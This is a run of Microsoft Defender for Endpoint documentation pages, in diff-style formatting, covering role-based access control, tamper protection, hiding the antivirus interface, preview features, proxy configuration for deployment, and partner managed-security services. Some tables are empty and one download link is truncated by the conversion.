-The next step when deploying Defender for Endpoint is to assign roles and permissions for The Defender for Endpoint deployment.
-
-## Role-based access control
-
-Microsoft recommends using the concept of least privileges. Defender for Endpoint leverages built-in roles within Microsoft Entra ID. Microsoft recommends [review the different roles that are available](/azure/active-directory/roles/permissions-reference) and choose the right one to solve your needs for each persona for this application. Some roles may need to be applied temporarily and removed after the deployment has been completed.
-
-<br>
-
-****
-
-|Personas|Roles|Microsoft Entra role (if necessary)|Assign to|
-|||||
-|Security Administrator||||
-|Security Analyst||||
-|Endpoint Administrator||||
-|Infrastructure Administrator||||
-|Business Owner/Stakeholder||||
-|
-
-Microsoft recommends using [Privileged Identity Management](/azure/active-directory/active-directory-privileged-identity-management-configure) to manage your roles to provide additional auditing, control, and access review for users with directory permissions.
-
-Defender for Endpoint supports two ways to manage permissions:
--- **Basic permissions management**: Set permissions to either full access or read-only. Users with Global Administrator or Security Administrator roles in Microsoft Entra ID have full access. The Security reader role has read-only access and does not grant access to view machines/device inventory.--- **Role-based access control (RBAC)**: Set granular permissions by defining roles, assigning Microsoft Entra user groups to the roles, and granting the user groups access to device groups. For more information. see [Manage portal access using role-based access control](rbac.md).-
-Microsoft recommends leveraging RBAC to ensure that only users that have a business justification can access Defender for Endpoint.
-
-You can find details on permission guidelines here: [Create roles and assign the role to a Microsoft Entra group](/microsoft-365/security/defender-endpoint/user-roles#create-roles-and-assign-the-role-to-an-azure-active-directory-group).
-
-The following example table serves to identify the Cyber Defense Operations Center structure in your environment that will help you determine the RBAC structure required for your environment.
-
-|Tier|Description|Permission Required|
-||||
-|Tier 1|**Local security operations team / IT team** <p> This team usually triages and investigates alerts contained within their geolocation and escalates to Tier 2 in cases where an active remediation is required.||
-|Tier 2|**Regional security operations team** <p> This team can see all the devices for their region and perform remediation actions.|View data|
-|Tier 3|**Global security operations team** <p> This team consists of security experts and is authorized to see and perform all actions from the portal.|View data <p> Alerts investigation Active remediation actions <p> Alerts investigation Active remediation actions <p> Manage portal system settings <p> Manage security settings|
-
-## Next step
-
-After assigning roles and permissions to view and manage Defender for Endpoint it's time for [Step 3 - Identify your architecture and choose your deployment method](deployment-strategy.md).
security Prevent Changes To Security Settings With Tamper Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection.md
- Title: Protect security settings with tamper protection--
-description: Use tamper protection to prevent malicious apps from changing important security settings.
- Previously updated : 02/13/2024------ nextgen-- admindeeplinkDEFENDER---- m365-security-- tier2-- mde-ngp--
-# Protect security settings with tamper protection
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-- [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md)-
-**Platforms**
--- Windows-- [macOS](tamperprotection-macos.md)-
-## What is tamper protection?
-
-Tamper protection is a capability in Microsoft Defender for Endpoint that helps protect certain security settings, such as virus and threat protection, from being disabled or changed. During some kinds of cyber attacks, bad actors try to disable security features on devices. Disabling security features provides bad actors with easier access to your data, the ability to install malware, and the ability to exploit your data, identity, and devices. Tamper protection helps guard against these types of activities.
-
-Tamper protection is part of anti-tampering capabilities that include [standard protection attack surface reduction rules](attack-surface-reduction-rules-reference.md). Tamper protection is an important part of [built-in protection](built-in-protection.md).
-
-## What happens when tamper protection is turned on?
-
-When tamper protection is turned on, these tamper-protected settings can't be changed:
--- Virus and threat protection remains enabled.-- Real-time protection remains turned on.-- Behavior monitoring remains turned on.-- Antivirus protection, including IOfficeAntivirus (IOAV) remains enabled.-- Cloud protection remains enabled.-- Security intelligence updates occur.-- Automatic actions are taken on detected threats.-- Notifications are visible in the Windows Security app on Windows devices.-- Archived files are scanned.-- [Exclusions cannot be modified or added ](/microsoft-365/security/defender-endpoint/manage-tamper-protection-intune#tamper-protection-for-antivirus-exclusions)-
-*As of signature release `1.383.1159.0`, due to confusion around the default value for "Allow Scanning Network Files", tamper protection no longer locks this setting to its default value. In managed environments, the default value is `enabled`.*
-
-> [!IMPORTANT]
-> When tamper protection is turned on, tamper-protected settings cannot be changed. To avoid breaking management experiences, including [Intune](manage-tamper-protection-intune.md) and [Configuration Manager](manage-tamper-protection-configuration-manager.md), keep in mind that changes made to tamper-protected settings might appear to succeed but are actually blocked by tamper protection. Depending on your particular scenario, you have several options available:
-> - If you must make changes to a device and those changes are blocked by tamper protection, you can use [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device.
-> - You can use Intune or Configuration Manager to exclude devices from tamper protection.
-
-Tamper protection doesn't prevent you from viewing your security settings. And, tamper protection doesn't affect how non-Microsoft antivirus apps register with the Windows Security app. If your organization is using Defender for Endpoint, individual users can't change the tamper protection setting; in those cases, your security team manages tamper protection. For more information, see [How do I configure or manage tamper protection](#how-do-i-configure-or-manage-tamper-protection)?
-
-## On what devices can tamper protection be enabled?
-
-Tamper protection is available for devices that are running one of the following versions of Windows:
--- Windows 10 and 11 (including Enterprise multi-session)-- Windows Server 2022, Windows Server 2019, and Windows Server, version 1803 or later-- Windows Server 2016 and Windows Server 2012 R2 (using the modern, unified solution)-
-Tamper protection is also available for Mac, although it works a little differently than on Windows. For more information, see [Protect macOS security settings with tamper protection](tamperprotection-macos.md).
-
-> [!TIP]
-> [Built-in protection](built-in-protection.md) includes turning tamper protection on by default. For more information, see:
-> - [Built-in protection helps guard against ransomware](built-in-protection.md) (article)
-> - [Tamper protection will be turned on for all enterprise customers](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/tamper-protection-will-be-turned-on-for-all-enterprise-customers/ba-p/3616478) (Tech Community blog post)
-
-### Tamper protection on Windows Server 2012 R2, 2016, or Windows version 1709, 1803, or 1809
-
-If you're using Windows Server 2012 R2 using the modern unified solution, Windows Server 2016, Windows 10 version 1709, 1803, or [1809](/windows/release-health/status-windows-10-1809-and-windows-server-2019), you don't see **Tamper Protection** in the Windows Security app. Instead, you can use PowerShell to determine whether tamper protection is enabled.
-
-> [!IMPORTANT]
-> On Windows Server 2016, the Settings app doesn't accurately reflect the status of real-time protection when tamper protection is enabled.
-
-### Use PowerShell to determine whether tamper protection and real-time protection are turned on
-
-1. Open the Windows PowerShell app.
-
-2. Use the [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus?preserve-view=true&view=win10-ps) PowerShell cmdlet.
-
-3. In the list of results, look for `IsTamperProtected` or `RealTimeProtectionEnabled`. (A value of *true* means tamper protection is enabled.)
-
-## How do I configure or manage tamper protection?
-
-You can use Microsoft Intune and other methods to configure or manage tamper protection, as listed in the following table:
-
-| Method | What you can do |
-|:|:|
-| Use the [Microsoft Defender portal](https://security.microsoft.com). | Turn tamper protection on (or off), tenant wide. See [Manage tamper protection for your organization using Microsoft Defender XDR](manage-tamper-protection-microsoft-365-defender.md). <br/><br/>*This method doesn't override settings that are managed in Microsoft Intune or Configuration Manager.* |
-| Use the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) or [Configuration Manager](/mem/configmgr/protect/deploy-use/endpoint-protection-configure). | Turn tamper protection on (or off), tenant wide, or apply tamper protection to some users/devices. You can exclude certain devices from tamper protection. See [Manage tamper protection for your organization using Intune](manage-tamper-protection-intune.md).<br/><br/>Protect Microsoft Defender Antivirus exclusions from tampering if you're using Intune only or Configuration Manager only. See [Tamper protection for antivirus exclusions](manage-tamper-protection-intune.md#tamper-protection-for-antivirus-exclusions). |
-| Use [Configuration Manager with tenant attach](manage-tamper-protection-configuration-manager.md). | Turn tamper protection on (or off), tenant wide, or apply tamper protection to some users/devices. You can exclude certain devices from tamper protection. See [Manage tamper protection for your organization using tenant attach with Configuration Manager, version 2006](manage-tamper-protection-configuration-manager.md). |
-| Use the [Windows Security app](manage-tamper-protection-individual-device.md). | Turn tamper protection on (or off) on an individual device that isn't managed by a security team (such as devices for home use). See [Manage tamper protection on an individual device](manage-tamper-protection-individual-device.md).<br/><br/>*This method doesn't override tamper protection settings that are set in the Microsoft Defender portal, Intune, or Configuration Manager, and it isn't intended to be used by organizations.* |
-
-> [!TIP]
-> If you're using Group Policy to manage Microsoft Defender Antivirus settings, keep in mind that any changes made to tamper-protected settings are ignored. If you must make changes to a device and those changes are blocked by tamper protection, use [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device. After troubleshooting mode ends, any changes made to tamper-protected settings are reverted to their configured state.
-
-## Protect Microsoft Defender Antivirus exclusions
-
-Under certain conditions, tamper protection can protect exclusions that are defined for Microsoft Defender Antivirus. For more information, see [Tamper protection for exclusions](manage-tamper-protection-intune.md#tamper-protection-for-antivirus-exclusions).
-
-## View information about tampering attempts
-
-Tampering attempts typically indicate that a larger cyberattack has taken place. Bad actors try to change security settings as a way to persist and stay undetected. If you're part of your organization's security team, you can view information about such attempts, and then take appropriate actions to mitigate threats.
-
-Whenever a tampering attempt is detected, an alert is raised in the [Microsoft Defender portal](/microsoft-365/security/defender-endpoint/portal-overview) ([https://security.microsoft.com](https://security.microsoft.com)).
-
-Using [endpoint detection and response](overview-endpoint-detection-response.md) and [advanced hunting](advanced-hunting-overview.md) capabilities in Microsoft Defender for Endpoint, your security operations team can investigate and address such attempts.
-
-## Review your security recommendations
-
-Tamper protection integrates with [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md) capabilities. [Security recommendations](tvm-security-recommendation.md) include making sure tamper protection is turned on. For example, in your [Vulnerability Management dashboard](/microsoft-365/security/defender-vulnerability-management/tvm-dashboard-insights#vulnerability-management-dashboard), you can search on *tamper*. In the results, you can select **Turn on Tamper Protection** to learn more and turn it on.
-
-To learn more about Microsoft Defender Vulnerability Management, see [Dashboard insights - Defender Vulnerability Management](tvm-dashboard-insights.md#dashboard-insightsthreat-and-vulnerability-management).
--
-## See also
--- [Built-in protection helps guard against ransomware](built-in-protection.md)-- [Frequently asked questions on tamper protection](faqs-on-tamper-protection.yml)-- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)-- [Defender for Endpoint on non-Windows devices](configure-endpoints-non-windows.md)-
security Prevent End User Interaction Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/prevent-end-user-interaction-microsoft-defender-antivirus.md
- Title: Hide the Microsoft Defender Antivirus interface
-description: You can hide virus and threat protection tile in the Windows Security app.
---- Previously updated : 07/26/2023------- m365-security-- tier2-- mde-ngp--
-# Prevent users from seeing or interacting with the Microsoft Defender Antivirus user interface
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-You can use Group Policy to prevent users on endpoints from seeing the Microsoft Defender Antivirus interface. You can also prevent them from pausing scans.
-
-## Hide the Microsoft Defender Antivirus interface
-
-In Windows 10, versions 1703, hiding the interface hides Microsoft Defender Antivirus notifications and prevent the Virus & threat protection tile from appearing in the Windows Security app.
-
-With the setting set to **Enabled**:
--
-With the setting set to **Disabled** or not configured:
--
-> [!NOTE]
-> Hiding the interface will also prevent Microsoft Defender Antivirus notifications from appearing on the endpoint. Microsoft Defender for Endpoint notifications will still appear. You can also individually [configure the notifications that appear on endpoints](configure-notifications-microsoft-defender-antivirus.md)
-
-In earlier versions of Windows 10, the setting hides the Windows Defender client interface. If the user attempts to open it, they'll receive a warning that says, "Your system administrator has restricted access to this app."
--
-## Use Group Policy to hide the Microsoft Defender Antivirus interface from users
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/desktop/gpmc/group-policy-management-console-portal), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. Using the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Select **Administrative templates**.
-
-4. Expand the tree to **Windows components > Microsoft Defender Antivirus > Client interface**.
-
-5. Double-click the **Enable headless UI mode** setting and set the option to **Enabled**. Select **OK**.
-
-See [Prevent users from locally modifying policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md) for more options on preventing users from modifying protection on their PCs.
-
-## Prevent users from pausing a scan
-
-You can prevent users from pausing scans, which can be helpful to ensure scheduled or on-demand scans aren't interrupted by users.
-
-> [!NOTE]
-> This setting is not supported on Windows 10.
-
-### Use Group Policy to prevent users from pausing a scan
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/desktop/gpmc/group-policy-management-console-portal), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. Using the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Select **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Scan**.
-
-5. Double-click the **Allow users to pause scan** setting and set the option to **Disabled**. Select **OK**.
-
-## UI Lockdown mode
-
-Indicates whether to disable UI Lockdown mode. If you specify a value of `$True`, Microsoft Defender Antivirus disables UI Lockdown mode. If you specify a value of `$False` or don't specify a value, UI Lockdown mode is enabled.
-
-```
-PS C:\>Set-MpPreference -UILockdown $true
-```
-
-## Related articles
--- [Configure the notifications that appear on endpoints](configure-notifications-microsoft-defender-antivirus.md)-- [Configure end-user interaction with Microsoft Defender Antivirus](configure-end-user-interaction-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)--
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
security Preview Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/preview-settings.md
- Title: Turn on the preview experience in Microsoft Defender for Endpoint
-description: Turn on the preview experience in Microsoft Defender for Endpoint to try upcoming features.
------- m365-security-- tier2- Previously updated : 12/18/2020--
-# Turn on the preview experience in Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-previewsettings-abovefoldlink)
-
-Turn on the preview experience setting to be among the first to try upcoming features.
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Advanced features**.
-
- :::image type="content" source="../../media/atp-preview-features-new.png" alt-text="The settings and preview experience" lightbox="../../media/atp-preview-features-new.png":::
--
-2. Toggle the setting between **On** and **Off** and select **Save preferences**.
-
-## Related topics
-- [Update general settings in Microsoft Defender for Endpoint](data-retention-settings.md)-- [Turn on advanced features in Microsoft Defender for Endpoint](advanced-features.md)-- [Configure email notifications in Microsoft Defender for Endpoint](configure-email-notifications.md)--
security Preview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/preview.md
- Title: Microsoft Defender for Endpoint preview features
-description: Learn how to access Microsoft Defender for Endpoint preview features.
------- m365-security-- tier2- Previously updated : 12/18/2020--
-# Microsoft Defender for Endpoint preview features
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-The Defender for Endpoint service is constantly being updated to include new feature enhancements and capabilities.
-
-Learn about new features in the Defender for Endpoint preview release and be among the first to try upcoming features by turning on the preview experience.
-
-For more information on new capabilities that are generally available, see [What's new in Defender for Endpoint](whats-new-in-microsoft-defender-endpoint.md).
-
-## What you need to know
-
-When working with features in public preview, these features:
--- May have restricted or limited functionality. For example, the feature may only apply to one platform.-- Typically go through feature changes before they're generally available (GA).-- Are fully supported by Microsoft.-- May only be available in selected geographic regions or cloud environments. For example, the feature may not exist in the government cloud.-- Individual features in preview may have more usage and support restrictions. If so, this information is typically noted in the feature documentation.-- The preview versions are provided with a standard support level, and can be used for production environments.-
-## Turn on preview features
-
-You'll have access to upcoming features that you can provide feedback on to help improve the overall experience before features are generally available.
-
-Turn on the preview experience setting to be among the first to try upcoming features.
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Advanced features** \> **Preview features**.
-
-2. Toggle the setting between **On** and **Off** and select **Save preferences**.
-
-> [!TIP]
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-preview-belowfoldlink)
security Production Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/production-deployment.md
- Title: Set up Microsoft Defender for Endpoint deployment
-description: Learn how to set up the deployment for Microsoft Defender for Endpoint
-----
- - m365-security
- - m365solution-endpointprotect
- - m365solution-scenario
- - highpri
- - tier1
--- Previously updated : 11/29/2023--
-# Set up Microsoft Defender for Endpoint deployment
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-The first step when deploying Microsoft Defender for Endpoint is to set up your Defender for Endpoint environment.
-
-In this deployment scenario, you'll be guided through the steps on:
--- Licensing validation-- Tenant configuration-- Network configuration-
-> [!NOTE]
-> For the purpose of guiding you through a typical deployment, this scenario will only cover the use of Microsoft Configuration Manager. Defender for Endpoint supports the use of other onboarding tools but we won't cover those scenarios in the deployment guide. For more information, see [Identify Defender for Endpoint architecture and deployment method](deployment-strategy.md).
-
-## Check license state
-
-Checking for the license state and whether it was properly provisioned can be done through the admin center or through the **Microsoft Azure portal**.
-
-1. To view your licenses, go to the **Microsoft Azure portal** and navigate to the [Microsoft Azure portal license section](https://portal.azure.com/#blade/Microsoft_AAD_IAM/LicensesMenuBlade/Products).
-
- :::image type="content" source="media/atp-licensing-azure-portal.png" alt-text="The Azure Licensing page" lightbox="media/atp-licensing-azure-portal.png":::
-
-1. Alternately, in the admin center, navigate to **Billing** \> **Subscriptions**.
-
- On the screen, you'll see all the provisioned licenses and their current **Status**.
-
- :::image type="content" source="media/atp-billing-subscriptions.png" alt-text="The billing licenses page":::
-
-## Cloud Service Provider validation
-
-To gain access into which licenses are provisioned to your company, and to check the state of the licenses, go to the admin center.
-
-1. From the **Partner portal**, select **Administer services > Office 365**.
-
-2. Clicking on the **Partner portal** link will open the **Admin on behalf** option and will give you access to the customer admin center.
-
- :::image type="content" source="media/atp-O365-admin-portal-customer.png" alt-text="The Office 365 admin portal" lightbox="media/atp-O365-admin-portal-customer.png":::
-
-## Tenant Configuration
-
-Onboarding to Microsoft Defender for Endpoint is easy. From the navigation menu, select any item under the Endpoints section, or any Microsoft Defender XDR feature such as Incidents, Hunting, Action center, or Threat analytics to initiate the onboarding process.
-
-From a web browser, navigate to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-## Data center location
-
-Microsoft Defender for Endpoint will store and process data in the [same location as used by Microsoft Defender XDR](/microsoft-365/security/defender/m365d-enable). If Microsoft Defender XDR has not been turned on yet, onboarding to Microsoft Defender for Endpoint will also turn on Microsoft Defender XDR and a new data center location is automatically selected based on the location of active Microsoft 365 security services. The selected data center location is shown on the screen.
-
-## Network configuration
-
-If the organization doesn't require the endpoints to use a Proxy to access the Internet, skip this section.
-
-The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and communicate with the Microsoft Defender for Endpoint service. The embedded Microsoft Defender for Endpoint sensor runs in the system context using the LocalSystem account. The sensor uses Microsoft Windows HTTP Services (WinHTTP) to enable communication with the Microsoft Defender for Endpoint cloud service. The WinHTTP configuration setting is independent of the Windows Internet (WinINet) internet browsing proxy settings and can only discover a proxy server by using the following discovery methods:
--- **Autodiscovery methods**:
- - Transparent proxy
- - Web Proxy Autodiscovery Protocol (WPAD)
-
- If a Transparent proxy or WPAD has been implemented in the network topology, there is no need for special configuration settings. For more information on Microsoft Defender for Endpoint URL exclusions in the proxy, see the [Proxy Service URLs](production-deployment.md#proxy-service-urls) section in this document for the URLs allow list or on [Configure device proxy and Internet connectivity settings](configure-environment.md#enable-access-to-microsoft-defender-for-endpoint-service-urls-in-the-proxy-server).
--- **Manual static proxy configuration**:
- - Registry-based configuration
- - WinHTTP configured using netsh command
-
- Suitable only for desktops in a stable topology (for example: a desktop in a corporate network behind the same proxy).
-
-### Configure the proxy server manually using a registry-based static proxy
-
-Configure a registry-based static proxy to allow only Microsoft Defender for Endpoint sensor to report diagnostic data and communicate with Microsoft Defender for Endpoint services if a computer isn't permitted to connect to the Internet. The static proxy is configurable through Group Policy (GP). The group policy can be found under:
--- Administrative Templates \> Windows Components \> Data Collection and Preview Builds \> Configure Authenticated Proxy usage for the Connected User Experience and Telemetry Service-- Set it to **Enabled** and select **Disable Authenticated Proxy usage**-
-1. Open the Group Policy Management Console.
-2. Create a policy or edit an existing policy based off the organizational practices.
-3. Edit the Group Policy and navigate to **Administrative Templates \> Windows Components \> Data Collection and Preview Builds \> Configure Authenticated Proxy usage for the Connected User Experience and Telemetry Service**.
-
- :::image type="content" source="media/atp-gpo-proxy1.png" alt-text="The options related to configuration of the usage policy" lightbox="media/atp-gpo-proxy1.png":::
-
-4. Select **Enabled**.
-5. Select **Disable Authenticated Proxy usage**.
-6. Navigate to **Administrative Templates \> Windows Components \> Data Collection and Preview Builds \> Configure connected user experiences and telemetry**.
-
- :::image type="content" source="media/atp-gpo-proxy2.png" alt-text="The options related to configuration of the connected user experience and telemetry" lightbox="media/atp-gpo-proxy2.png":::
-
-7. Select **Enabled**.
-8. Enter the **Proxy Server Name**.
-
-The policy sets two registry values `TelemetryProxyServer` as REG_SZ and `DisableEnterpriseAuthProxy` as REG_DWORD under the registry key `HKLM\Software\Policies\Microsoft\Windows\DataCollection`.
-
-The registry value `TelemetryProxyServer` takes the following string format:
-
-`<server name or ip>:<port>`
-
-For example: 10.0.0.6:8080
-
-The registry value `DisableEnterpriseAuthProxy` should be set to 1.
-
-### Configure the proxy server manually using netsh command
-
-Use netsh to configure a system-wide static proxy.
-
-> [!NOTE]
->
-> - This will affect all applications including Windows services which use WinHTTP with default proxy.
-> - Laptops that are changing topology (for example: from office to home) will malfunction with netsh. Use the registry-based static proxy configuration.
-
-1. Open an elevated command line:
- 1. Go to **Start** and type **cmd**.
- 1. Right-click **Command prompt** and select **Run as administrator**.
-
-2. Enter the following command and press **Enter**:
-
- ```cmd
- netsh winhttp set proxy <proxy>:<port>
- ```
-
- For example: netsh winhttp set proxy 10.0.0.6:8080
-
-### Proxy Configuration for down-level devices
-
-Down-Level devices include Windows 7 SP1 and Windows 8.1 workstations as well as Windows Server 2008 R2, and other server operating systems that have been onboarded previously using the Microsoft Monitoring Agent. These operating systems will have the proxy configured as part of the Microsoft Management Agent to handle communication from the endpoint to Azure. Refer to the Microsoft Management Agent Fast Deployment Guide for information on how a proxy is configured on these devices.
-
-### Proxy Service URLs
-
-URLs that include v20 in them are only needed if you have Windows 10, version 1803 or Windows 11 devices. For example, `us-v20.events.data.microsoft.com` is only needed if the device is on Windows 10, version 1803 or Windows 11.
-
-If a proxy or firewall is blocking anonymous traffic, as Microsoft Defender for Endpoint sensor is connecting from system context, make sure anonymous traffic is permitted in the listed URLs.
-
-The following downloadable spreadsheet lists the services and their associated URLs that your network must be able to connect to. Ensure there are no firewall or network filtering rules that would deny access to these URLs, or you may need to create an *allow* rule specifically for them.
--
-| Spreadsheet of domains list | Description |
-|||
-|Microsoft Defender for Endpoint URL list for commercial customers| Spreadsheet of specific DNS records for service locations, geographic locations, and OS for commercial customers. <br/><br/> [Download the spreadsheet here](https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx). |
-| Microsoft Defender for Endpoint URL list for Gov/GCC/DoD | Spreadsheet of specific DNS records for service locations, geographic locations, and OS for Gov/GCC/DoD customers. <br/><br/> [Download the spreadsheet here](https://download.microsoft.com/download/6/e-urls-gov.xlsx). |
-
-## Next step
--- Continue to [Step 2 - Assign roles and permissions](prepare-deployment.md)
security Professional Services https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/professional-services.md
- Title: Professional services supported by Microsoft Defender XDR
-description: See the list of professional services that Microsoft Defender XDR can integrate with.
------- m365-security-- tier3- Previously updated : 08/18/2023--
-# Professional services supported by Microsoft Defender XDR
-
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender for Endpoint-- Microsoft Defender for Vulnerability Management-- Microsoft Defender for Office 365-- Microsoft Defender for Identity-- Microsoft Defender for Cloud Apps-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-The following professional services can be integrated with the Microsoft Defenders products:
-
-## Manage
-
-Managed security services that assist organizations to detect threats early and help minimize the affects of a breach.
-
-|Service name|Vendor|Description|
-||||
-|[Microsoft Defender Experts](https://go.microsoft.com/fwlink/?linkid=2203232)|Microsoft|Defender Experts for Hunting are a proactive threat hunting service for Microsoft Defender XDR.|
-|[Cloud Security Operations Center](https://go.microsoft.com/fwlink/?linkid=2202671)|glueckkanja-gab AG|Monitors your Microsoft Security Solutions 24/7, responds to threats on your behalf and works closely with your IT to continuously improve your security posture.|
-|[Wortell Protect](https://go.microsoft.com/fwlink/?linkid=2202480)|Wortell|Wortell offers a 24.7.365 Managed Detection and Response service, SOC-as-a-service, to secure your Azure subscriptions and Microsoft 365 environment. With this managed service, Wortell provides security monitoring and incident response, and operate Microsoft Defender and (optionally) Microsoft Sentinel on your behalf. The service also includes threat intelligence feeds and custom machine learning models|
-|[CRITICALSTART® Managed Detection & Response Services for Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2202761)|CRITICALSTART|Critical Start Managed Detection and Response (MDR) services for Microsoft Defender XDR (M365D) extends security defenses to provide cross-domain threat protection and simplify breach prevention. Their team of Microsoft security experts uses integration with M365D to detect, investigate, and respond with the right actions to alerts from identity, to email and cloud – before they disrupt business operations.|
-|[CRITICALSTART® Managed Detection & Response Services for Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2202844)|CRITICALSTART|Critical Start Managed Detection & Response (MDR) service for Microsoft Defender for Endpoint simplifies security across an expanded attack surface area. It combines Microsoft's cross-enterprise visibility threat detection, and auto investigation capabilities with optimized threat detection and response to deliver an 80% reduction in false positives on the first day of production monitoring.|
-|[InSpark Cloud Security Center](https://go.microsoft.com/fwlink/?linkid=2202387)|InSpark|InSparks' Cloud Security Center is a 24x7 Managed Security Solution including SOC services. It continuously provides your Microsoft cloud platform with the highest level of security.|
-|[Mandiant MDR for Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2202388)|Mandiant, Inc.|Mandiant Managed Defense protects your business with a managed detection and response (MDR) service, fueled by dedicated and frontline experts who protect against motivated adversaries. With a combination of up-to-the-minute threat intelligence, data science, and real-world expertise, Managed Defense helps customers optimize investments in technology, maximize resources, and accelerate investigations.|
-|[Onevinn MDR](https://go.microsoft.com/fwlink/?linkid=2202390)|Onevinn|Onevinn MDR, Managed Detection and Response, built on Microsoft Defender and Microsoft Sentinel is a unified pre- and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks.|
